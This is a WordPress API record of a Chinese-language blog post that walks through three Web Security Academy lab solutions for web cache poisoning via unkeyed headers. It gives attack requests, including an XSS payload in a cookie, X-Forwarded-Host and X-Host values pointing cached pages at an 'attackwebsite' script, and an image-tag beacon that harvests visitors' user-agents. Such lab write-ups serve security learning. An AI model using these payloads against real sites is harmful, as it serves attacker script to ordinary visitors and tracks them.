{"id":1129,"date":"2023-02-05T22:45:00","date_gmt":"2023-02-05T14:45:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1129"},"modified":"2024-04-14T11:28:26","modified_gmt":"2024-04-14T03:28:26","slug":"web-cache-poisioning-header","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1129","title":{"rendered":"web cache poisioning header"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u95dc\u65bc\u5feb\u53d6\u6295\u6bd2\u7684\u4ecb\u7d39\u53ef\u53c3\u8003<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-wp-embed\"><div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"wp-embedded-content\" data-secret=\"ee1cgZM9Tw\"><a href=\"https:\/\/systw.net\/note\/archives\/1127\">web cache poisioning<\/a><\/blockquote><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"web cache poisioning &#8212; \u725b\u7684\u5927\u8166\" src=\"https:\/\/systw.net\/note\/archives\/1127\/embed#?secret=X7ShJJDBjb#?secret=ee1cgZM9Tw\" data-secret=\"ee1cgZM9Tw\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe>\n<\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528header\u5feb\u53d6\u6295\u6bd2\u7684\u653b\u64ca\u65b9\u5f0f\uff0c\u5e38\u898b\u6709\u4ee5\u4e0b\u5e7e\u7a2e\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5c0dcookie\u6295\u6bd2<\/li>\n\n\n\n<li>\u642d\u914d\u591a\u500b\u96b1\u85cf\u53c3\u6578\u6295\u6bd2<\/li>\n\n\n\n<li>\u53c3\u8003vary header\u9032\u884c\u6295\u6bd2<\/li>\n<\/ul>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5c0dcookie\u6295\u6bd2<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u76ee\u6a19\u4f7f\u7528cookie\u4e2d\u7684language\u4f86\u8abf\u6574\u7db2\u7ad9\u7684\u8a9e\u8a00\uff0c\u800c\u4e14\u6e2c\u8a66\u5f8c\u767c\u73fecookie\u662f<code>unkeyed header<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u91dd\u5c0dcookie\u6e2c\u8a66\u5f8c\u767c\u73fefehost\u5167\u5bb9\u6703\u5f71\u97ff\u8fd4\u56de\u7d50\u679c\uff0c\u8acb\u6c42cookie\u5167\u7684fehost=prod-cache-01\uff0c\u6703\u5728\u8fd4\u56de\u7d50\u679c\u51fa\u73fe&#8221;frontend&#8221;:&#8221;prod-cache-01&#8243;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>######## normal request ########\nGET \/ HTTP\/1.1\n...omit...\nCookie: session=7i0KrIGW9poQxsd5H6a8uBYuf1HvMnYL; fehost=prod-cache-01\n\n######## normal response ########\n...omit...\nCache-Control: max-age=30\nAge: 0\nX-Cache: miss\n...omit...\n        &lt;script&gt;\n            data = {\n                \"host\":\"ac561f3b1eef788e80c7316300cc0076.web-security-academy.net\",\n                \"path\":\"\/\",\n                \"frontend\":\"prod-cache-01\"\n            }\n        &lt;\/script&gt;\n...omit...<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u56e0\u6b64\u53ea\u8981\u5c0dcookie\u5167\u7684fehost\u505a\u6c61\u67d3,\uff0c\u5c31\u53ef\u4ee5\u5be6\u73fe\u5feb\u53d6\u4e2d\u6bd2\u653b\u64ca<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>######## attack request ########\nGET \/ HTTP\/1.1\n...omit...\nCookie: session=7i0KrIGW9poQxsd5H6a8uBYuf1HvMnYL; fehost=someString\"-alert(1)-\"someString\n\n######## attack response ########\n...omit...\nCache-Control: max-age=30\nAge: 0\nX-Cache: miss\n...omit...\n        &lt;script&gt;\n            data = {\n                \"host\":\"ac561f3b1eef788e80c7316300cc0076.web-security-academy.net\",\n                \"path\":\"\/\",\n                \"frontend\":\"someString\"-alert(1)-\"someString\"\n            }\n        &lt;\/script&gt;\n...omit...<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u572830\u79d2\u5167\u5982\u679c\u6709\u8a2a\u5ba2\u5b58\u53d6\u76f8\u540curl\uff0c\u5247\u8fd4\u56de\u7d50\u679c\u662f\u88ab\u6c61\u67d3\u7684\u9801\u9762<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">lab: Web cache poisoning with an unkeyed cookie<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u642d\u914d\u591a\u500b\u96b1\u85cf\u53c3\u6578\u6295\u6bd2<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u6709\u6642\u5019\u662f\u75312\u500b\u96b1\u85cf\u53c3\u6578\u624d\u6703\u7522\u751f\u8fd4\u56de\u5167\u5bb9\u7684\u8b8a\u5316<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee5\u9019\u500b\u76ee\u6a19\u70ba\u4f8b\uff0c\u900f\u904eparam mining\u767c\u73fe\u4ee5\u4e0b2\u500b\u70ba\u96b1\u85cf\u53c3\u6578\uff0c\u800c\u4e14\u89c0\u5bdf\u767c\u73fe\u70ba <code>unkeyed header<\/code><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>X-Forwarded-Host\uff1a\u642d\u914dX-Forwarded-Scheme\u6642\uff0c\u9019\u500b\u503c\u4ee3\u8868\u65b0\u7db2\u5740<\/li>\n\n\n\n<li>X-Forwarded-Scheme\uff1a\u7576\u503c\u70bahttp:\/\/\u6703\u89f8\u767c302<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ea\u900f\u904eX-Forwarded-Host: example.net\uff0c\u770b\u4e0d\u51fa\u6709\u4ec0\u9ebc\u6548\u679c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/resources\/js\/tracking.js HTTP\/1.1\nHost: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net\nX-Forwarded-Host: example.net\n\n########## response ###########\nHTTP\/1.1 504 Gateway Timeout<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ea\u900f\u904eX-Forwarded-Scheme: http:\/\/\uff0c\u53ef\u770b\u5230\u6703\u51fa\u73fe302\uff0c\u5982\u679c\u63db\u6210https:\/\/\u5247\u4e0d\u6703\u6709\u8b8a\u5316<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/resources\/js\/tracking.js HTTP\/1.1\nHost: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net\nX-Forwarded-Scheme: http:\/\/\n...omit...\n\n########## response ###########\nHTTP\/1.1 302 Found\nLocation: https:\/\/ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net\/resources\/js\/tracking.js\n...omit...<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u5982\u679c\u5408\u4f75\u4e0a\u8ff02\u500b\u96b1\u85cf\u53c3\u6578\uff0c\u5c31\u80fd\u69cb\u9020\u8f49\u5740\u7684\u8acb\u6c42<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ea\u8981\u628a\u4e3b\u6a5f\u63db\u6210\u653b\u64ca\u8005\u4e3b\u6a5f\uff0c\u4e26\u5728\u653b\u64ca\u8005\u4e3b\u6a5f\u7684resources\/js\/tracking.js\u6e96\u5099\u60e1\u610f\u4ee3\u78bc\uff0c\u5c31\u53ef\u4ee5\u5c0d\u5feb\u53d6\u6295\u6bd2\uff0c\u5982\u4e0b <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/resources\/js\/tracking.js HTTP\/1.1\nHost: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net\nX-Forwarded-Host: attackwebsite\nX-Forwarded-Scheme: http:\/\/\n...omit...\n\n########## response ###########\nHTTP\/1.1 302 Found\nLocation: attackwebsite\/resources\/js\/tracking.js\nConnection: close\nCache-Control: max-age=30\nAge: 7\nX-Cache: hit<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u6295\u6bd2\u5f8c\u572830\u79d2\u5167\u5982\u679c\u6709\u8a2a\u5ba2\u5b58\u53d6resources\/js\/tracking.js\uff0c\u5247\u8fd4\u56de\u7d50\u679c\u662f\u653b\u64ca\u8005\u63d0\u4f9b\u7684resources\/js\/tracking.js<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">lab: Web cache poisoning with multiple headers<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u53c3\u8003vary header\u9032\u884c\u6295\u6bd2<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee5\u9019\u500b\u76ee\u6a19\u70ba\u4f8b\uff0c\u900f\u904eparam mining\u767c\u73fe\u4ee51\u500b\u96b1\u85cf\u53c3\u6578\u70baX-Host\uff0c\u800c\u4e14\u89c0\u5bdf\u767c\u73fe\u70ba <code>unkeyed header<\/code>\uff0c\u56e0\u6b64\u5c0d\u8a72\u53c3\u6578\u9032\u884c\u6295\u6bd2\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/ HTTP\/1.1\nHost: ac6d1f9e1ead800f80f628ab006a0084.web-security-academy.net\nX-Host: attackwebsite\n...omit...\n\n########## response ###########\n...omit...\nVary: user-agent\n...omit...\n&lt;script type=\"text\/javascript\" src=\"\/\/attackwebsite\/resources\/js\/tracking.js\"&gt;&lt;\/script&gt;\n...omit...<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e0d\u904e\u9019\u88e1\u8981\u6ce8\u610f\u7684\u5730\u65b9\u662f\u8fd4\u56de\u5167\u5bb9\u6709vary: user-agent\uff0c\u9019\u4ee3\u8868user-agent\u662f<code>key header<\/code>\u3002\u63db\u53e5\u8a71\u8aaa\uff0c\u8a2a\u5ba2\u9664\u4e86\u8981\u5b58\u53d6\u76f8\u540chost\u5916\uff0cuser-agent\u4e5f\u5fc5\u9808\u8981\u4e00\u6a23\uff0c\u624d\u80fd\u8a2a\u554f\u5230\u88ab\u6c61\u67d3\u7684\u5feb\u53d6\u5167\u5bb9<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728\u9019\u500b\u76ee\u6a19\u7db2\u7ad9\u4e2d\uff0c\u7559\u8a00\u5340\u5141\u8a31html\uff0c\u56e0\u6b64\u53ef\u4ee5\u900f\u904e\u9019\u500b\u65b9\u5f0f\uff0c\u53d6\u5f97\u6bcf\u500b\u8a2a\u5ba2\u7684user-agent<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;img src=\"https:\/\/attackwebsite\/foo\" \/&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8a2a\u5ba2\u4e00\u4f46\u770b\u5230\u7559\u8a00\uff0c\u5c31\u6703\u89f8\u767c\u8a72html\uff0c\u53ea\u8981\u5230attackwebsite\u770b\u7db2\u9801\u65e5\u5fd7\u8a18\u9304\uff0c\u4fbf\u80fd\u770b\u5230\u8a2a\u5ba2\u7684user-agent<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>172.31.30.128   2023-09-18 08:40:09 +0000 \"GET \/foo HTTP\/1.1\" 404 \"User-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.149 Safari\/537.36\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u53d6\u5f97user-agent\u70ba<code>Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.149 Safari\/537.36<\/code>\u5f8c\uff0c\u5c31\u53ef\u4ee5\u91cd\u65b0\u69cb\u9020\u4e00\u500b\u6295\u6bd2\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/ HTTP\/1.1\nHost: ac6d1f9e1ead800f80f628ab006a0084.web-security-academy.net\nX-Host: attackwebsite\nConnection: close\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.149 Safari\/537.36\n...omit...\n\n########## response ###########\n...omit...\n&lt;script type=\"text\/javascript\" src=\"\/\/attackwebsite\/resources\/js\/tracking.js\"&gt;&lt;\/script&gt;\n...omit...<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u572830\u79d2\u5167\u5982\u679c\u6709\u8a2a\u5ba2\u8a2a\u554f\u76f8\u540c\u7684host\uff0c\u4e26\u4f7f\u7528\u76f8\u540c\u7684user-agent\uff0c\u5247\u8fd4\u56de\u7d50\u679c\u662f\u88ab\u6c61\u67d3\u7684\u9801\u9762<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Lab: Targeted web cache poisoning using an unknown header<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u95dc\u65bc\u5feb\u53d6\u6295\u6bd2\u7684\u4ecb\u7d39\u53ef\u53c3\u8003 \u4f7f\u7528header\u5feb\u53d6\u6295\u6bd2\u7684\u653b\u64ca\u65b9\u5f0f &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[368],"tags":[],"class_list":["post-1129","post","type-post","status-publish","format-standard","hentry","category-operations"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":1127,"url":"https:\/\/systw.net\/note\/archives\/1127","url_meta":{"origin":1129,"position":0},"title":"web cache poisioning","author":"raymond","date":"2023 \u5e74 1 \u6708 17 \u65e5","format":false,"excerpt":"\u5982\u679c\u5728\u5feb\u53d6\u7684\u904e\u7a0b\u4e2d\uff0c\u5b58\u5165\u4e86\u6709\u5bb3\u7684\u5167\u5bb9\uff0c\u4f8b\u5982\u5b58\u5165\u4e86\u4e00\u500b\u6709XSS payload\u7684\u9801\u9762\u3002 \u5176\u4ed6\u7528\u6236\u9020\u8a2a\u6642\u2026","rel":"","context":"\u5728\u300cOperations\u300d\u4e2d","block_context":{"text":"Operations","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/operations"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1137,"url":"https:\/\/systw.net\/note\/archives\/1137","url_meta":{"origin":1129,"position":1},"title":"HOST header attack","author":"raymond","date":"2023 \u5e74 1 \u6708 20 \u65e5","format":false,"excerpt":"Host header\u7684\u76ee\u7684\u662f\u5e6b\u52a9\u8b58\u5225\u5ba2\u6236\u7aef\u60f3\u8981\u8207\u54ea\u500b\u5f8c\u7aef\u5143\u4ef6\u9032\u884c\u901a\u8a0a\uff0c\u7279\u5225\u662f\u540c\u4e00 IP \u4f4d\u5740\u5b58\u53d6\u591a\u2026","rel":"","context":"\u5728\u300cLogic Vulnerabilities\u300d\u4e2d","block_context":{"text":"Logic Vulnerabilities","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/logic-vulnerabilities"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1207,"url":"https:\/\/systw.net\/note\/archives\/1207","url_meta":{"origin":1129,"position":2},"title":"Web Cache Poisioning URL","author":"raymond","date":"2023 \u5e74 2 \u6708 8 \u65e5","format":false,"excerpt":"\u7db2\u7ad9\u7684\u5927\u90e8\u5206\u8f38\u5165\u4f86\u81eaURL\u548c\u67e5\u8a62\u5b57\u4e32\uff0c\u4f46\u662f\u9019\u4e9b\u8acb\u6c42\u884c\u901a\u5e38\u662f\u5feb\u53d6\u9375\u7684\u4e00\u90e8\u5206\uff0c\u56e0\u6b64\u4e00\u822c\u4f86\u8aaa\u4e0d\u6703\u7528\u505a\u5feb\u53d6\u4e2d\u2026","rel":"","context":"\u5728\u300cOperations\u300d\u4e2d","block_context":{"text":"Operations","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/operations"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":851,"url":"https:\/\/systw.net\/note\/archives\/851","url_meta":{"origin":1129,"position":3},"title":"Application Proxy","author":"raymond","date":"2008 \u5e74 7 \u6708 6 \u65e5","format":false,"excerpt":"\u00a0\u5feb\u53d6\u4f3a\u670d\u5668\u512a\u9ede\uff1a\u00a0\u6e1b\u5c11\u983b\u5bec\u6d6a\u8cbb\u00a0\u964d\u4f4e\u7db2\u9801\u4f3a\u670d\u5668\u7684\u8ca0\u64d4\u00a0&n\u2026","rel":"","context":"\u5728\u300cOSI Layer7\u300d\u4e2d","block_context":{"text":"OSI Layer7","link":"https:\/\/systw.net\/note\/archives\/category\/network\/osi-layer7"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":861,"url":"https:\/\/systw.net\/note\/archives\/861","url_meta":{"origin":1129,"position":4},"title":"Internet Caching Technology","author":"raymond","date":"2007 \u5e74 11 \u6708 6 \u65e5","format":false,"excerpt":"Web Caching\u6548\u7387\u7684\u6539\u5584\u4e3b\u8981\u8457\u91cd\u5728\uff1a1\u63d0\u9ad8accumulative cache\u00a0hit ra\u2026","rel":"","context":"\u5728\u300cOSI Layer7\u300d\u4e2d","block_context":{"text":"OSI Layer7","link":"https:\/\/systw.net\/note\/archives\/category\/network\/osi-layer7"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":736,"url":"https:\/\/systw.net\/note\/archives\/736","url_meta":{"origin":1129,"position":5},"title":"\u8a18\u61b6\u9ad4\u7cfb\u7d71-\u5feb\u53d6\u8a18\u61b6\u9ad4","author":"raymond","date":"2009 \u5e74 10 \u6708 27 \u65e5","format":false,"excerpt":"caching(\u5feb\u53d6)\u5b9a\u7fa9:\u7528\u4f86\u66ab\u6642\u5b58\u653e\u8cc7\u6599\u7684\u4e00\u7a2e\u8a18\u61b6\u9ad4\u7a7a\u9593,\u5b58\u53d6\u6642\u53ef\u5148\u5230\u9019\u4e00\u500b\u8a18\u61b6\u9ad4\u7a7a\u9593\u5c0b\u627e,\u800c\u6e1b\u2026","rel":"","context":"\u5728\u300c\u8a08\u7b97\u6a5f\u7d44\u7e54\u8207\u7d50\u69cb\u300d\u4e2d","block_context":{"text":"\u8a08\u7b97\u6a5f\u7d44\u7e54\u8207\u7d50\u69cb","link":"https:\/\/systw.net\/note\/archives\/category\/system\/computerarchitecture"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1129","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1129"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1129\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1129"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1129"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1129"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}